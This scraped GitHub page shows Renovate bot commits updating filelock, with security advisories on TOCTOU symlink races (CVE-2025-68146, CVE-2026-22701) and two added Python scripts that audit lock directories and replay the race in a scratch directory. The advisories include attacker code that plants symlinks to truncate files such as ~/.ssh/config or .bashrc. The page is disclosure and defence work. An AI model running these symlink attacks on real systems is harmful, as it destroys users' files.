**Users should:**

- Upgrade to the patched version when available
- For critical deployments, consider using `UnixFileLock` or `WindowsFileLock` instead of the fallback `SoftFileLock`

---

##### Workarounds

_Is there a way for users to fix or remediate the vulnerability without upgrading?_

For users unable to update immediately:

1. **Avoid `SoftFileLock` in security-sensitive contexts** - use `UnixFileLock` or `WindowsFileLock` when available (these were already patched for CVE-2025-68146)
2. **Restrict filesystem permissions** - prevent untrusted users from creating symlinks in lock file directories:
   ```bash
   chmod 700 /path/to/lock/directory
   ```
3. **Use process isolation** - isolate untrusted code from lock file paths to prevent symlink creation
4. **Monitor lock operations** - implement application-level checks to verify lock acquisitions are successful before proceeding with critical operations

---

##### References

_Are there any links users can visit to find out more?_

- **Similar Vulnerability:** CVE-2025-68146 (TOCTOU vulnerability in UnixFileLock/WindowsFileLock)
- **CWE-362 (Concurrent Execution using Shared Resource):** https://cwe.mitre.org/data/definitions/362.html
- **CWE-367 (Time-of-check Time-of-use Race Condition):** https://cwe.mitre.org/data/definitions/367.html
- **CWE-59 (Improper Link Resolution Before File Access):** https://cwe.mitre.org/data/definitions/59.html
- **O_NOFOLLOW documentation:** https://man7.org/linux/man-pages/man2/open.2.html
- **GitHub Repository:** https://github.com/tox-dev/filelock

---

**Reported by:** George Tsigourakos (@​tsigouris007)

#### Severity

- CVSS Score: 5.3 / 10 (Medium)
- Vector String: `CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:H`

#### References

- [https://github.com/tox-dev/filelock/security/advisories/GHSA-qmgc-5h2g-mvrw](https://redirect.github.com/tox-dev/filelock/security/advisories/GHSA-qmgc-5h2g-mvrw)
- [https://nvd.nist.gov/vuln/detail/CVE-2026-22701](https://nvd.nist.gov/vuln/detail/CVE-2026-22701)
- [https://github.com/tox-dev/filelock/commit/255ed068bc85d1ef406e50a135e1459170dd1bf0](https://redirect.github.com/tox-dev/filelock/commit/255ed068bc85d1ef406e50a135e1459170dd1bf0)
- [https://github.com/tox-dev/filelock/commit/41b42dd2c72aecf7da83dbda5903b8087dddc4d5](https://redirect.github.com/tox-dev/filelock/commit/41b42dd2c72aecf7da83dbda5903b8087dddc4d5)
- [https://github.com/tox-dev/filelock](https://redirect.github.com/tox-dev/filelock)

This data is provided by [OSV](https://osv.dev/vulnerability/GHSA-qmgc-5h2g-mvrw) and the [GitHub Advisory Database](https://redirect.github.com/github/advisory-database) ([CC-BY 4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).

</details>

---

### Release Notes

<details>
<summary>tox-dev/py-filelock (filelock)</summary>

### [`v3.28.0`](https://redirect.github.com/tox-dev/filelock/releases/tag/3.28.0)

[Compare Source](https://redirect.github.com/tox-dev/py-filelock/compare/3.25.2...3.28.0)

<!-- Release notes generated using configuration in .github/release.yaml at 3.28.0 -->

#### What's Changed

- 🐛 fix(ci): unbreak release workflow, publish to PyPI again by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#529](https://redirect.github.com/tox-dev/filelock/pull/529)

**Full Changelog**: <tox-dev/filelock@3.27.0...3.28.0>

</details>

---

### Configuration

📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 **Automerge**: Enabled.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box

---

This PR has been generated by [Renovate Bot](https://redirect.github.com/renovatebot/renovate).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My44My4yIiwidXBkYXRlZEluVmVyIjoiNDMuODMuMiIsInRhcmdldEJyYW5jaCI6Im1haW4iLCJsYWJlbHMiOlsiZGVwZW5kZW5jaWVzIiwiZmlsZWxvY2siLCJyZW5vdmF0ZSJdfQ==-->

Co-authored-by: renovate-coop-norge[bot] <151545514+renovate-coop-norge[bot]@users.noreply.github.com>
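The directory-permission and symlink checks behind the workaround list in the advisories above (restrict the lock directory, watch it for planted symlinks), as an added example that is not part of the Renovate commit or of filelock itself: a pre-flight audit that application code can run before it hands a lock path to `FileLock`. `audit_lock_dir`, `lock_path_is_safe` and `demo` are names chosen here; the scenarios run in a scratch directory with a constructed symlink and assume a POSIX platform where an unprivileged user can create symlinks.

```python
"""Added example: audit a lock-file directory for the conditions the
filelock advisories' workarounds rely on. Not filelock's own code."""
import os
import stat
import tempfile


def audit_lock_dir(directory: str) -> list:
    """Return findings for a directory that will hold lock files (empty == passes).

    Checks: the path is a real directory, only the current user can write to it
    (so nobody else can plant a symlink), and nothing inside is already a symlink.
    """
    findings = []
    st = os.lstat(directory)                    # lstat: do not follow a symlinked dir
    if stat.S_ISLNK(st.st_mode):
        findings.append("lock directory path is itself a symlink")
        return findings
    if not stat.S_ISDIR(st.st_mode):
        findings.append("lock directory path is not a directory")
        return findings
    mode = stat.S_IMODE(st.st_mode)
    if mode & stat.S_IWOTH:
        findings.append(f"world-writable (mode {mode:04o}): any local user can plant symlinks")
    elif mode & stat.S_IWGRP:
        findings.append(f"group-writable (mode {mode:04o}): group members can plant symlinks")
    if st.st_uid != os.geteuid():
        findings.append(f"owned by uid {st.st_uid}, not the current euid {os.geteuid()}")
    for entry in os.scandir(directory):
        if entry.is_symlink():                  # planted link, dangling or not
            findings.append(f"symlink {entry.name} -> {os.readlink(entry.path)}")
    return findings


def lock_path_is_safe(lock_file: str) -> bool:
    """Gate for application code: use lock_file only if its parent directory passes
    the audit and lock_file itself is not (yet) a symlink."""
    parent = os.path.dirname(os.path.abspath(lock_file)) or "."
    if audit_lock_dir(parent):
        return False
    try:
        return not stat.S_ISLNK(os.lstat(lock_file).st_mode)
    except FileNotFoundError:
        return True                             # not created yet; the directory check is what matters


def demo() -> dict:
    """Constructed scenarios in a scratch directory; returns the findings per scenario."""
    results = {}
    with tempfile.TemporaryDirectory() as d:
        os.chmod(d, 0o700)                      # the chmod 0700 the workaround recommends
        results["locked_down"] = audit_lock_dir(d)
        results["clean_path_safe"] = lock_path_is_safe(os.path.join(d, "app.lock"))
        os.chmod(d, 0o1777)                     # shaped like a shared /tmp
        results["tmp_like"] = audit_lock_dir(d)
        os.chmod(d, 0o700)
        os.symlink("/etc/passwd", os.path.join(d, "app.lock"))  # constructed "attacker" link
        results["symlink_planted"] = audit_lock_dir(d)
        results["lock_path_safe"] = lock_path_is_safe(os.path.join(d, "app.lock"))
        results["other_path_safe"] = lock_path_is_safe(os.path.join(d, "other.lock"))
    return results


if __name__ == "__main__":
    for scenario, result in demo().items():
        print(f"{scenario}: {result}")
```

This is a pre-flight check, not a fix: a directory that passes at audit time can still be raced afterwards, which is why the advisory's "partial mitigation" warning stands. Once any symlink is found the whole directory is treated as tainted, so `other.lock` is refused as well as the planted `app.lock`.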
renovate-coop-norge Bot
added a commit
to coopnorge/engineering-docker-images
that referenced
this pull request
Apr 15, 2026
This PR contains the following updates:

| Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [filelock](https://redirect.github.com/tox-dev/py-filelock) | `3.25.2` → `3.28.0` |  |  |

---

### filelock has a TOCTOU race condition which allows symlink attacks during lock file creation

[CVE-2025-68146](https://nvd.nist.gov/vuln/detail/CVE-2025-68146) / [GHSA-w853-jp5j-5j7f](https://redirect.github.com/advisories/GHSA-w853-jp5j-5j7f)

<details>
<summary>More information</summary>

#### Details

##### Impact

A Time-of-Check-Time-of-Use (TOCTOU) race condition allows local attackers to corrupt or truncate arbitrary user files through symlink attacks. The vulnerability exists in both Unix and Windows lock file creation where filelock checks if a file exists before opening it with O_TRUNC. An attacker can create a symlink pointing to a victim file in the time gap between the check and open, causing os.open() to follow the symlink and truncate the target file.

**Who is impacted:** All users of filelock on Unix, Linux, macOS, and Windows systems. The vulnerability cascades to dependent libraries:

- **virtualenv users**: Configuration files can be overwritten with virtualenv metadata, leaking sensitive paths
- **PyTorch users**: CPU ISA cache or model checkpoints can be corrupted, causing crashes or ML pipeline failures
- **poetry/tox users**: through using virtualenv or filelock on their own.

Attack requires local filesystem access and ability to create symlinks (standard user permissions on Unix; Developer Mode on Windows 10+). Exploitation succeeds within 1-3 attempts when lock file paths are predictable.

##### Patches

Fixed in version **3.20.1**.

**Unix/Linux/macOS fix:** Added O_NOFOLLOW flag to os.open() in UnixFileLock.\_acquire() to prevent symlink following.

**Windows fix:** Added GetFileAttributesW API check to detect reparse points (symlinks/junctions) before opening files in WindowsFileLock.\_acquire().

**Users should upgrade to filelock 3.20.1 or later immediately.**

##### Workarounds

If immediate upgrade is not possible:

1. Use SoftFileLock instead of UnixFileLock/WindowsFileLock (note: different locking semantics, may not be suitable for all use cases)
2. Ensure lock file directories have restrictive permissions (chmod 0700) to prevent untrusted users from creating symlinks
3. Monitor lock file directories for suspicious symlinks before running trusted applications

**Warning:** These workarounds provide only partial mitigation. The race condition remains exploitable. Upgrading to version 3.20.1 is strongly recommended.

______________________________________________________________________

##### Technical Details: How the Exploit Works

##### The Vulnerable Code Pattern

**Unix/Linux/macOS** (`src/filelock/_unix.py:39-44`):

```python
def _acquire(self) -> None:
    ensure_directory_exists(self.lock_file)
    open_flags = os.O_RDWR | os.O_TRUNC  # (1) Prepare to truncate
    if not Path(self.lock_file).exists():  # (2) CHECK: Does file exist?
        open_flags |= os.O_CREAT
    fd = os.open(self.lock_file, open_flags, ...)  # (3) USE: Open and truncate
```

**Windows** (`src/filelock/_windows.py:19-28`):

```python
def _acquire(self) -> None:
    raise_on_not_writable_file(self.lock_file)  # (1) Check writability
    ensure_directory_exists(self.lock_file)
    flags = os.O_RDWR | os.O_CREAT | os.O_TRUNC  # (2) Prepare to truncate
    fd = os.open(self.lock_file, flags, ...)  # (3) Open and truncate
```

##### The Race Window

The vulnerability exists in the gap between operations:

**Unix variant:**

```
Time    Victim Thread                          Attacker Thread
----    -------------                          ---------------
T0      Check: lock_file exists? → False
T1      ↓ RACE WINDOW
T2                                             Create symlink: lock → victim_file
T3      Open lock_file with O_TRUNC
        → Follows symlink
        → Opens victim_file
        → Truncates victim_file to 0 bytes! ☠️
```

**Windows variant:**

```
Time    Victim Thread                          Attacker Thread
----    -------------                          ---------------
T0      Check: lock_file writable?
T1      ↓ RACE WINDOW
T2                                             Create symlink: lock → victim_file
T3      Open lock_file with O_TRUNC
        → Follows symlink/junction
        → Opens victim_file
        → Truncates victim_file to 0 bytes! ☠️
```

##### Step-by-Step Attack Flow

**1. Attacker Setup:**

```python
# Attacker identifies target application using filelock
lock_path = "/tmp/myapp.lock"  # Predictable lock path
victim_file = "/home/victim/.ssh/config"  # High-value target
```

**2. Attacker Creates Race Condition:**

```python
import os
import threading


def attacker_thread():
    # Remove any existing lock file
    try:
        os.unlink(lock_path)
    except FileNotFoundError:
        pass
    # Create symlink pointing to victim file
    os.symlink(victim_file, lock_path)
    print(f"[Attacker] Created: {lock_path} → {victim_file}")


# Launch attack
threading.Thread(target=attacker_thread).start()
```

**3. Victim Application Runs:**

```python
from filelock import UnixFileLock

# Normal application code
lock = UnixFileLock("/tmp/myapp.lock")
lock.acquire()  # ← VULNERABILITY TRIGGERED HERE

# At this point, /home/victim/.ssh/config is now 0 bytes!
```

**4. What Happens Inside os.open():**

On Unix systems, when `os.open()` is called:

```c
// Linux kernel behavior (simplified)
int open(const char *pathname, int flags) {
    struct file *f = path_lookup(pathname);  // Resolves symlinks by default!
    if (flags & O_TRUNC) {
        truncate_file(f);  // ← Truncates the TARGET of the symlink
    }
    return file_descriptor;
}
```

Without `O_NOFOLLOW` flag, the kernel follows the symlink and truncates the target file.

##### Why the Attack Succeeds Reliably

**Timing Characteristics:**

- **Check operation** (Path.exists()): ~100-500 nanoseconds
- **Symlink creation** (os.symlink()): ~1-10 microseconds
- **Race window**: ~1-5 microseconds (very small but exploitable)
- **Thread scheduling quantum**: ~1-10 milliseconds

**Success factors:**

1. **Tight loop**: Running attack in a loop hits the race window within 1-3 attempts
2. **CPU scheduling**: Modern OS thread schedulers frequently context-switch during I/O operations
3. **No synchronization**: No atomic file creation prevents the race
4. **Symlink speed**: Creating symlinks is extremely fast (metadata-only operation)

##### Real-World Attack Scenarios

**Scenario 1: virtualenv Exploitation**

```python
import os

# Victim runs: python -m venv /tmp/myenv

# Attacker racing to create:
os.symlink("/home/victim/.bashrc", "/tmp/myenv/pyvenv.cfg")

# Result: /home/victim/.bashrc overwritten with:
#   home = /usr/bin/python3
#   include-system-site-packages = false
#   version = 3.11.2
# ← Original .bashrc contents LOST + virtualenv metadata LEAKED to attacker
```

**Scenario 2: PyTorch Cache Poisoning**

```python
import os

# Victim runs: import torch
# PyTorch checks CPU capabilities, uses filelock on cache

# Attacker racing to create:
os.symlink("/home/victim/.torch/compiled_model.pt",
           "/home/victim/.cache/torch/cpu_isa_check.lock")

# Result: Trained ML model checkpoint truncated to 0 bytes
# Impact: Weeks of training lost, ML pipeline DoS
```

##### Why Standard Defenses Don't Help

**File permissions don't prevent this:**

- Attacker doesn't need write access to victim_file
- os.open() with O_TRUNC follows symlinks using the *victim's* permissions
- The victim process truncates its own file

**Directory permissions help but aren't always feasible:**

- Lock files often created in shared /tmp directory (mode 1777)
- Applications may not control lock file location
- Many apps use predictable paths in user-writable directories

**File locking doesn't prevent this:**

- The truncation happens *during* the open() call, before any lock is acquired
- fcntl.flock() only prevents concurrent lock acquisition, not symlink attacks

##### Exploitation Proof-of-Concept Results

From empirical testing with the provided PoCs:

**Simple Direct Attack** (`filelock_simple_poc.py`):

- Success rate: 33% per attempt (1 in 3 tries)
- Average attempts to success: 2.1
- Target file reduced to 0 bytes in \<100ms

**virtualenv Attack** (`weaponized_virtualenv.py`):

- Success rate: ~90% on first attempt (deterministic timing)
- Information leaked: File paths, Python version, system configuration
- Data corruption: Complete loss of original file contents

**PyTorch Attack** (`weaponized_pytorch.py`):

- Success rate: 25-40% per attempt
- Impact: Application crashes, model loading failures
- Recovery: Requires cache rebuild or model retraining

**Discovered and reported by:** George Tsigourakos (@​tsigouris007)

#### Severity

- CVSS Score: 6.3 / 10 (Medium)
- Vector String: `CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H`

#### References

- [https://github.com/tox-dev/filelock/security/advisories/GHSA-w853-jp5j-5j7f](https://redirect.github.com/tox-dev/filelock/security/advisories/GHSA-w853-jp5j-5j7f)
- [https://github.com/tox-dev/filelock/commit/4724d7f8c3393ec1f048c93933e6e3e6ec321f0e](https://redirect.github.com/tox-dev/filelock/commit/4724d7f8c3393ec1f048c93933e6e3e6ec321f0e)
- [https://github.com/tox-dev/filelock](https://redirect.github.com/tox-dev/filelock)
- [https://github.com/tox-dev/filelock/releases/tag/3.20.1](https://redirect.github.com/tox-dev/filelock/releases/tag/3.20.1)
- [https://learn.microsoft.com/en-us/windows/win32/fileio/file-attribute-constants](https://learn.microsoft.com/en-us/windows/win32/fileio/file-attribute-constants)
- [https://pubs.opengroup.org/onlinepubs/9699919799/functions/open.html](https://pubs.opengroup.org/onlinepubs/9699919799/functions/open.html)

This data is provided by [OSV](https://osv.dev/vulnerability/GHSA-w853-jp5j-5j7f) and the [GitHub Advisory Database](https://redirect.github.com/github/advisory-database) ([CC-BY 4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### filelock Time-of-Check-Time-of-Use (TOCTOU) Symlink Vulnerability in SoftFileLock

[CVE-2026-22701](https://nvd.nist.gov/vuln/detail/CVE-2026-22701) / [GHSA-qmgc-5h2g-mvrw](https://redirect.github.com/advisories/GHSA-qmgc-5h2g-mvrw)

<details>
<summary>More information</summary>

#### Details

##### Vulnerability Summary

**Title:** Time-of-Check-Time-of-Use (TOCTOU) Symlink Vulnerability in SoftFileLock

**Affected Component:** `filelock` package - `SoftFileLock` class

**File:** `src/filelock/_soft.py` lines 17-27

**CWE:** CWE-362, CWE-367, CWE-59

---

##### Description

A TOCTOU race condition vulnerability exists in the `SoftFileLock` implementation of the filelock package. An attacker with local filesystem access and permission to create symlinks can exploit a race condition between the permission validation and file creation to cause lock operations to fail or behave unexpectedly.

The vulnerability occurs in the `_acquire()` method between `raise_on_not_writable_file()` (permission check) and `os.open()` (file creation). During this race window, an attacker can create a symlink at the lock file path, potentially causing the lock to operate on an unintended target file or leading to denial of service.

##### Attack Scenario

```
1. Lock attempts to acquire on /tmp/app.lock
2. Permission validation passes
3. [RACE WINDOW] - Attacker creates: ln -s /tmp/important.txt /tmp/app.lock
4. os.open() tries to create lock file
5. Lock operates on attacker-controlled target file or fails
```

---

##### Impact

_What kind of vulnerability is it? Who is impacted?_

This is a **Time-of-Check-Time-of-Use (TOCTOU) race condition vulnerability** affecting any application using `SoftFileLock` for inter-process synchronization.

**Affected Users:**

- Applications using `filelock.SoftFileLock` directly
- Applications using the fallback `FileLock` on systems without `fcntl` support (e.g., GraalPy)

**Consequences:**

- **Silent lock acquisition failure** - applications may not detect that exclusive resource access is not guaranteed
- **Denial of Service** - attacker can prevent lock file creation by maintaining symlink
- **Resource serialization failures** - multiple processes may acquire "locks" simultaneously
- **Unintended file operations** - lock could operate on attacker-controlled files

**CVSS v4.0 Score:** 5.6 (Medium)

**Vector:** CVSS:4.0/AV:L/AT:L/PR:L/UI:N/VC:N/VI:L/VA:H/SC:N/SI:N/SA:N

**Attack Requirements:**

- Local filesystem access to the directory containing lock files
- Permission to create symlinks (standard for regular unprivileged users on Unix/Linux)
- Ability to time the symlink creation during the narrow race window

---

##### Patches

_Has the problem been patched? What versions should users upgrade to?_

Yes, the vulnerability has been patched by adding the `O_NOFOLLOW` flag to prevent symlink following during lock file creation.

**Patched Version:** Next release (commit: 255ed068bc85d1ef406e50a135e1459170dd1bf0)

**Mitigation Details:**

- The `O_NOFOLLOW` flag is added conditionally and gracefully degrades on platforms without support
- On platforms with `O_NOFOLLOW` support (most modern systems): symlink attacks are completely prevented
- On platforms without `O_NOFOLLOW` (e.g., GraalPy): TOCTOU window remains but is documented

**Users should:**

- Upgrade to the patched version when available
- For critical deployments, consider using `UnixFileLock` or `WindowsFileLock` instead of the fallback `SoftFileLock`

---

##### Workarounds

_Is there a way for users to fix or remediate the vulnerability without upgrading?_

For users unable to update immediately:

1. **Avoid `SoftFileLock` in security-sensitive contexts** - use `UnixFileLock` or `WindowsFileLock` when available (these were already patched for CVE-2025-68146)
2. **Restrict filesystem permissions** - prevent untrusted users from creating symlinks in lock file directories:
   ```bash
   chmod 700 /path/to/lock/directory
   ```
3. **Use process isolation** - isolate untrusted code from lock file paths to prevent symlink creation
4. **Monitor lock operations** - implement application-level checks to verify lock acquisitions are successful before proceeding with critical operations

---

##### References

_Are there any links users can visit to find out more?_

- **Similar Vulnerability:** CVE-2025-68146 (TOCTOU vulnerability in UnixFileLock/WindowsFileLock)
- **CWE-362 (Concurrent Execution using Shared Resource):** https://cwe.mitre.org/data/definitions/362.html
- **CWE-367 (Time-of-check Time-of-use Race Condition):** https://cwe.mitre.org/data/definitions/367.html
- **CWE-59 (Improper Link Resolution Before File Access):** https://cwe.mitre.org/data/definitions/59.html
- **O_NOFOLLOW documentation:** https://man7.org/linux/man-pages/man2/open.2.html
- **GitHub Repository:** https://github.com/tox-dev/filelock

---

**Reported by:** George Tsigourakos (@​tsigouris007)

#### Severity

- CVSS Score: 5.3 / 10 (Medium)
- Vector String: `CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:H`

#### References

- [https://github.com/tox-dev/filelock/security/advisories/GHSA-qmgc-5h2g-mvrw](https://redirect.github.com/tox-dev/filelock/security/advisories/GHSA-qmgc-5h2g-mvrw)
- [https://nvd.nist.gov/vuln/detail/CVE-2026-22701](https://nvd.nist.gov/vuln/detail/CVE-2026-22701)
- [https://github.com/tox-dev/filelock/commit/255ed068bc85d1ef406e50a135e1459170dd1bf0](https://redirect.github.com/tox-dev/filelock/commit/255ed068bc85d1ef406e50a135e1459170dd1bf0)
- [https://github.com/tox-dev/filelock/commit/41b42dd2c72aecf7da83dbda5903b8087dddc4d5](https://redirect.github.com/tox-dev/filelock/commit/41b42dd2c72aecf7da83dbda5903b8087dddc4d5)
- [https://github.com/tox-dev/filelock](https://redirect.github.com/tox-dev/filelock)

This data is provided by [OSV](https://osv.dev/vulnerability/GHSA-qmgc-5h2g-mvrw) and the [GitHub Advisory Database](https://redirect.github.com/github/advisory-database) ([CC-BY 4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).

</details>

---

### Release Notes

<details>
<summary>tox-dev/py-filelock (filelock)</summary>

### [`v3.28.0`](https://redirect.github.com/tox-dev/filelock/releases/tag/3.28.0)

[Compare Source](https://redirect.github.com/tox-dev/py-filelock/compare/3.25.2...3.28.0)

<!-- Release notes generated using configuration in .github/release.yaml at 3.28.0 -->

#### What's Changed

- 🐛 fix(ci): unbreak release workflow, publish to PyPI again by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#529](https://redirect.github.com/tox-dev/filelock/pull/529)

**Full Changelog**: <tox-dev/filelock@3.27.0...3.28.0>

</details>

---

### Configuration

📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 **Automerge**: Enabled.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box

---

This PR has been generated by [Renovate Bot](https://redirect.github.com/renovatebot/renovate).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My44My4yIiwidXBkYXRlZEluVmVyIjoiNDMuODMuMiIsInRhcmdldEJyYW5jaCI6Im1haW4iLCJsYWJlbHMiOlsiZGVwZW5kZW5jaWVzIiwiZmlsZWxvY2siLCJyZW5vdmF0ZSJdfQ==-->

Co-authored-by: renovate-coop-norge[bot] <151545514+renovate-coop-norge[bot]@users.noreply.github.com>
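The check-then-truncate pattern quoted in the advisory above, beside the `O_NOFOLLOW` shape of the fix it describes, as an added example that is not filelock's own code: it replays the race with the attacker having already won it (the symlink is planted before the open), first against an existing target file and then with a dangling link, where an `O_CREAT` open that follows the link creates a file at the attacker's chosen path. `verified_acquire` and `fd_is_directory_entry` are names chosen here for an fstat/lstat fallback on platforms that lack `O_NOFOLLOW`; the example assumes a POSIX platform where `os.O_NOFOLLOW` exists and an unprivileged user can create symlinks, and everything runs inside a scratch directory with constructed file contents.

```python
"""Added example: the TOCTOU symlink race from the filelock advisories,
replayed with the attacker's symlink already in place. Not filelock's code."""
import errno
import os
import stat
import tempfile
from pathlib import Path

# os.O_NOFOLLOW is absent on some platforms (the advisory names GraalPy); the 0
# fallback makes hardened_acquire() degrade the way the patch documents.
O_NOFOLLOW = getattr(os, "O_NOFOLLOW", 0)


def vulnerable_acquire(lock_file: str) -> int:
    """Shape of the pre-3.20.1 Unix pattern from the advisory (no real lock taken)."""
    open_flags = os.O_RDWR | os.O_TRUNC
    if not Path(lock_file).exists():         # CHECK: exists() itself follows symlinks
        open_flags |= os.O_CREAT
    # USE: if lock_file is a symlink by now, the kernel follows it and truncates the target
    return os.open(lock_file, open_flags, 0o644)


def hardened_acquire(lock_file: str) -> int:
    """Same pattern plus O_NOFOLLOW: a symlink as the final path component fails with ELOOP,
    and the target is neither truncated nor created."""
    open_flags = os.O_RDWR | os.O_TRUNC | O_NOFOLLOW
    if not Path(lock_file).exists():
        open_flags |= os.O_CREAT
    return os.open(lock_file, open_flags, 0o644)


def fd_is_directory_entry(fd: int, path: str) -> bool:
    """True only if fd refers to the inode that `path` names directly, not via a symlink."""
    st_fd, st_path = os.fstat(fd), os.lstat(path)
    return not stat.S_ISLNK(st_path.st_mode) and (
        (st_fd.st_dev, st_fd.st_ino) == (st_path.st_dev, st_path.st_ino)
    )


def verified_acquire(lock_file: str) -> int:
    """Hypothetical fallback for platforms without O_NOFOLLOW: open WITHOUT O_TRUNC,
    verify which inode we hold, and only then truncate through the descriptor.
    Limit: an O_CREAT open that follows a dangling link still creates an empty file
    at the target before the check runs, so this stops data loss, not file creation."""
    open_flags = os.O_RDWR
    if not Path(lock_file).exists():
        open_flags |= os.O_CREAT
    fd = os.open(lock_file, open_flags, 0o644)
    if not fd_is_directory_entry(fd, lock_file):
        os.close(fd)
        raise OSError(errno.ELOOP, "lock path is a symlink; refusing to use it")
    os.ftruncate(fd, 0)                      # safe: we know exactly which inode this is
    return fd


def run_attack(acquire, dangling: bool = False) -> dict:
    """Replay the race with the attacker already having won it: the symlink is planted
    before acquire() runs. Returns what happened to the victim path."""
    with tempfile.TemporaryDirectory() as d:
        victim = os.path.join(d, "victim.txt")
        lock = os.path.join(d, "app.lock")
        if not dangling:
            with open(victim, "w") as fh:
                fh.write("secret config\n")  # constructed victim content, 14 bytes
        os.symlink(victim, lock)             # attacker: ln -s victim.txt app.lock
        try:
            os.close(acquire(lock))
            outcome = "opened"
        except OSError as e:
            outcome = errno.errorcode.get(e.errno, "OSError")
        exists = os.path.exists(victim)
        return {
            "outcome": outcome,
            "victim_exists": exists,
            "victim_size": os.path.getsize(victim) if exists else None,
        }


if __name__ == "__main__":
    for name, fn in (("vulnerable", vulnerable_acquire),
                     ("hardened", hardened_acquire),
                     ("verified", verified_acquire)):
        print(f"{name:10s} existing target: {run_attack(fn)}")
        print(f"{name:10s} dangling link:   {run_attack(fn, dangling=True)}")
```

Run it once and compare the three rows: the vulnerable open reports `opened` with the victim at 0 bytes, the `O_NOFOLLOW` open reports `ELOOP` with the 14 bytes intact and no file created for the dangling case, and the fstat/lstat fallback also refuses but has already created an empty `victim.txt` when the link was dangling, which is why the advisory treats `O_NOFOLLOW` as the fix and the rest as partial mitigation.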
rockygeekz
added a commit
to ansible/molecule
that referenced
this pull request
May 6, 2026
> ℹ️ **Note**
>
> This PR body was truncated due to platform limits.
This PR contains the following updates:
| Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | Type | Update | Pending |
|---|---|---|---|---|---|---|
| [ansible-navigator](https://redirect.github.com/ansible/ansible-navigator) ([changelog](https://redirect.github.com/ansible/ansible-navigator/releases)) | `26.1.3` → `26.4.0` |  |  | dependency-groups | minor | |
| [ansible/actions](https://redirect.github.com/ansible/actions) | `v0.5.1` → `v1.1.2` |  |  | repository | major | |
| [ansible/ansible-lint](https://redirect.github.com/ansible/ansible-lint) | `v26.2.0` → `v26.4.0` |  |  | repository | minor | |
| [ansible/team-devtools](https://redirect.github.com/ansible/team-devtools) | `v26.2.0` → `v26.4.0` |  |  | repository | minor | |
| [astral-sh/uv-pre-commit](https://redirect.github.com/astral-sh/uv-pre-commit) | `0.10.7` → `0.11.8` |  |  | repository | minor | `0.11.10` (+1) |
| [biomejs/pre-commit](https://redirect.github.com/biomejs/pre-commit) | `v2.4.4` → `v2.4.14` |  |  | repository | patch | |
| [build](https://redirect.github.com/pypa/build) ([changelog](https://build.pypa.io/en/stable/changelog.html)) | `1.4.2` → `1.5.0` |  |  | dependency-groups | minor | |
| [click](https://redirect.github.com/pallets/click) ([changelog](https://click.palletsprojects.com/page/changes/)) | `8.3.2` → `8.3.3` |  |  | project.dependencies | patch | |
| [filelock](https://redirect.github.com/tox-dev/py-filelock) | `3.25.2` → `3.29.0` |  |  | dependency-groups | minor | |
| [prek](https://prek.j178.dev/) ([source](https://redirect.github.com/j178/prek), [changelog](https://redirect.github.com/j178/prek/blob/master/CHANGELOG.md)) | `0.3.8` → `0.3.11` |  |  | dependency-groups | patch | `0.3.13` (+1) |
| [rhysd/actionlint](https://redirect.github.com/rhysd/actionlint) | `v1.7.11` → `v1.7.12` |  |  | repository | patch | |
| [rich](https://redirect.github.com/Textualize/rich) | `14.3.3` → `15.0.0` |  |  | project.dependencies | major | |
| [ruff](https://docs.astral.sh/ruff) ([source](https://redirect.github.com/astral-sh/ruff), [changelog](https://redirect.github.com/astral-sh/ruff/blob/main/CHANGELOG.md)) | `0.15.9` → `0.15.12` |  |  | dependency-groups | patch | |
| [tombi](https://redirect.github.com/tombi-toml/tombi) | `0.9.14` → `0.10.2` |  |  | dependency-groups | minor | `0.10.5` (+2) |
| [tox](https://redirect.github.com/tox-dev/tox) ([changelog](https://tox.wiki/en/latest/changelog.html)) | `4.52.0` → `4.53.1` |  |  | dependency-groups | minor | |
| [tox-uv](https://redirect.github.com/tox-dev/tox-uv#tox-uv) ([changelog](https://redirect.github.com/tox-dev/tox-uv/releases)) | `1.34.0` → `1.35.1` |  |  | dependency-groups | minor | `1.35.2` |
| [types-jsonschema](https://redirect.github.com/python/typeshed) ([changelog](https://redirect.github.com/typeshed-internal/stub_uploader/blob/main/data/changelogs/jsonschema.md)) | `4.26.0.20260402` → `4.26.0.20260408` |  |  | dependency-groups | patch | |
| [types-pexpect](https://redirect.github.com/python/typeshed) ([changelog](https://redirect.github.com/typeshed-internal/stub_uploader/blob/main/data/changelogs/pexpect.md)) | `4.9.0.20260127` → `4.9.0.20260408` |  |  | dependency-groups | patch | |
| [types-pyyaml](https://redirect.github.com/python/typeshed) ([changelog](https://redirect.github.com/typeshed-internal/stub_uploader/blob/main/data/changelogs/PyYAML.md)) | `6.0.12.20250915` → `6.0.12.20260408` |  |  | dependency-groups | patch | |
Note: The `pre-commit` manager in Renovate is not supported by the
`pre-commit` maintainers or community. Please do not report any problems
there, instead [create a Discussion in the Renovate
repository](https://redirect.github.com/renovatebot/renovate/discussions/new)
if you have any questions.
---
### Release Notes
<details>
<summary>ansible/ansible-navigator (ansible-navigator)</summary>
### [`v26.4.0`](https://redirect.github.com/ansible/ansible-navigator/releases/tag/v26.4.0)
[Compare
